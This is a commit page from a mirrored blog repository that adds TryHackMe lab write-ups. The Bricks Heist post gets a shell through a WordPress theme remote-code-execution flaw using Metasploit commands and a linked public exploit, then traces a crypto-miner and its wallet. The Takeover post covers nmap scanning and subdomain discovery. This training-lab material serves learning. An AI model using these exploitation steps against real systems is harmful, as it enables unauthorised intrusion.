mmckinnon/chirpy-starter
1
0
Fork 0
mirror of https://github.com/cotes2020/chirpy-starter.git synced 2025-04-12 07:33:27 +10:00
Code Issues Actions Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
Amca 2024-12-19 10:18:30 +08:00 committed by GitHub
parent 50d65a74e3
commit 623c4fa3f6
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
3 changed files with 230 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
_posts/2024-9-10-tryhackme-publisher.md Normal file
View File

@ -0,0 +1,10 @@
---
title: 'TryHackMe: Publisher'
author: AmcaQt
categories: [TryHackMe]
tags: [web, enumeration, subdomain, subdomain takeover]
render_with_liquid: false
media_subpath: /images/thm_publisher/
image:
path: room_card.png
---

119
_posts/2024-9-5-tryhackme-bricks-heist.md Normal file
View File

@ -0,0 +1,119 @@
---
title: 'TryHackMe: TryHack3M: Bricks Heist'
author: AmcaQt
categories: [TryHackMe]
tags: [web, enumeration, rce]
render_with_liquid: false
media_subpath: /images/thm_bricks_heist/
image:
path: room_card.png
---
![Tryhackme Room Link](room_image.PNG){: width="600" height="150" .shadow }
_<https://tryhackme.com/r/room/tryhack3mbricksheist>_
## Description
Brick Press Media Co. was working on creating a brand-new web theme that represents a renowned wall using three million byte bricks. Agent Murphy comes with a streak of bad luck. And here we go again: the server is compromised, and they've lost access.
Can you hack back the server and identify what happened there?
Note : Add `MACHINE_IP bricks.thm` to your /etc/hosts file.
## Question & Flag
### What is the content of the hidden .txt file in the web folder?
First, before do further enumaration, let's run the basic scan with nmap
![Nmap Scan](scan.PNG)
Interesting find here, without wasting any time let's look further with [**WpScan**](https://www.kali.org/tools/wpscan/)
![](2.PNG)
The scan shows the site using Theme `bricks` with version `1.9.5`, after some research and finding we found the version is Vuln to Unauthenticated RCE
![Remote Code Execution](3.PNG)
The exploit and cve for the version is on github but i want to use metasploit to speed up the exploit
> https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT
Power up your msfconsole and search for bricks, you shall find the matching modules
![](4.PNG)
simply use command use 0 and fill in the require and you shall get the shell
![](5.PNG)
```Command
set LHOST 10.8.58.21
set RHOSTS https://bricks.thm
set RPORT 443
run
```
with that you may find the answer for Task 1
![](6.jpg)
### What is the name of the suspicious process? & What is the service name affiliated with the suspicious process?
For this one go to google and do some research about it , then you'll found the command
![](systemctl.PNG)
get back to the terminal and try out the command
![](7.PNG)
but this is not the answer, let's try view the content of the service
![](8.jpg)
That's what we want
### What is the log file name of the miner instance?
Notice that the service is executing from `/lib/NetworkManager/` directory, go to that directory
![](9.jpg)
### What is the wallet address of the miner instance? & The wallet address used has been involved in transactions between wallets belonging to which threat group?
Using the strings on the log file that we view earlier, try to decode with [**CyberChef**](https://gchq.github.io/CyberChef/)
![](10.PNG)
kinda lost on what that is, but since we searched about wallet address so i did some research
![](wallet.PNG)
so i need to confirm it, go to [**Blockchair**](https://blockchair.com/) , lucky it was the correct one, so i went down to the last payment received
![](11.PNG)
Inside that transaction history and from there, inside the privacy check
![](12.PNG)
We can see the details on the transaction
![](13.PNG)
Copy the sender address and search it on google, most of the result return `LockBit`
> Source :
>
> https://ofac.treasury.gov/recent-actions/20240220
>
> https://www.chainalysis.com/blog/lockbit-takedown-sanctions-february-2024/
## Conclusion
This was fun Room and good for beginner to learn about `CVE` and how risky Outdated version of CMS such as `WordPress`.
# Happy Hacking
![Cute Gif](https://i.pinimg.com/originals/c6/ad/84/c6ad8481cee4f75d464b2a14040d06c9.gif)

101
_posts/2024-9-8-tryhackme-takeover.md Normal file
View File

@ -0,0 +1,101 @@
---
title: 'TryHackMe: Takeover'
author: AmcaQt
categories: [TryHackMe]
tags: [web, enumeration, subdomain, subdomain takeover]
render_with_liquid: false
media_subpath: /images/thm_takeover/
image:
path: room_card.png
---
![Tryhackme Room Link](room_image.PNG){: width="600" height="150" .shadow }
_<https://tryhackme.com/room/takeover>_
## Description
Hello there,
I am the CEO and one of the co-founders of futurevera.thm. In Futurevera, we believe that the future is in space. We do a lot of space research and write blogs about it. We used to help students with space questions, but we are rebuilding our support.
Recently blackhat hackers approached us saying they could takeover and are asking us for a big ransom. Please help us to find what they can takeover.
Our website is located at https://futurevera.thm
Hint: Don't forget to add the MACHINE_IP in /etc/hosts for futurevera.thm ; )
## Basic Scan
As usual we've been given a MACHINE_IP and need to put it on `/etc/hosts` with a named `futurevera.thm`. Lets run basic scan using Nmap
```Nmap Scan
┌──(amca㉿amcaqt)-[~]
└─$ nmap -A -T5 futurevera.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 14:19 +08
Warning: 10.10.200.103 giving up on port because retransmission cap hit (2).
Nmap scan report for futurevera.thm (10.10.200.103)
Host is up (0.20s latency).
Not shown: 910 closed tcp ports (conn-refused), 87 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 dd:29:a7:0c:05:69:1f:f6:26:0a:d9:28:cd:40:f0:20 (RSA)
| 256 cb:2e:a8:6d:03:66:e9:70:eb:96:e1:f5:ba:25:cb:4e (ECDSA)
|_ 256 50:d3:4b:a8:a2:4d:1d:79:e1:7d:ac:bb:ff:0b:24:13 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to https://futurevera.thm/
|_http-server-header: Apache/2.4.41 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.41
| ssl-cert: Subject: commonName=futurevera.thm/organizationName=Futurevera/stateOrProvinceName=Oregon/countryName=US
| Not valid before: 2022-03-13T10:05:19
|_Not valid after: 2023-03-13T10:05:19
|_http-title: FutureVera
|_http-server-header: Apache/2.4.41 (Ubuntu)
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.43 seconds
```
We foundd that there's 3 open port which is :
`22` ssh
`80` http
`443` ssl/http
### Subdomain Enumaration
#### First Subdomain
The Description mention `support`, which I assume they have `support` as their subdomain, so lets add that in `/etc/hosts` and looks what we can find on that subdomain. View the subdomain on firefox and shall find this :
![First Subdomain](1st-subdo.PNG)
#### Second Subdomain
By clicking the `View Cerificate` you shall find info about the subdomain `support.futurevera.thm`. If you a little lower you'll find Subject Alternative Names with DNS Names `s******************2.support.futurevera.htm` and as usual add the DNS Names in `/etc/hosts`
![Second Subdomain](2nd-subdo.jpg)
### What's the value of the flag?
By viewing the DNS Names on the browser you'll obtain the flag and will be redirect to [AWS Web Server](https://www.geeksforgeeks.org/aws-cloud-architecture-for-web-hosting/).
![Flag](flag.jpg)
### Conclusion
This room was fun and very interesting, it made me search and try to understand what is `Subdomain takeover`, and learned something new with this room.
If you want to learn more about `Subdomain Takeover`
- [Book.Hacktricks.xyz](https://book.hacktricks.xyz/pentesting-web/domain-subdomain-takeover)
- [HackerOne](https://www.hackerone.com/application-security/guide-subdomain-takeovers)
- [Developer.Mozilla](https://developer.mozilla.org/en-US/docs/Web/Security/Subdomain_takeovers)
## Happy Hacking
![](https://media1.tenor.com/m/aXVFqv8KInAAAAAC/anime-frieren.gif){: width="600" height="150" .shadow }